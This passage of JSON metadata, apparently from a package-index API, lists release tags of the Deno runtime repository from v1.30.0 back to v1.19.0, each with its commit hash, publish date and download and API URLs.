1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_u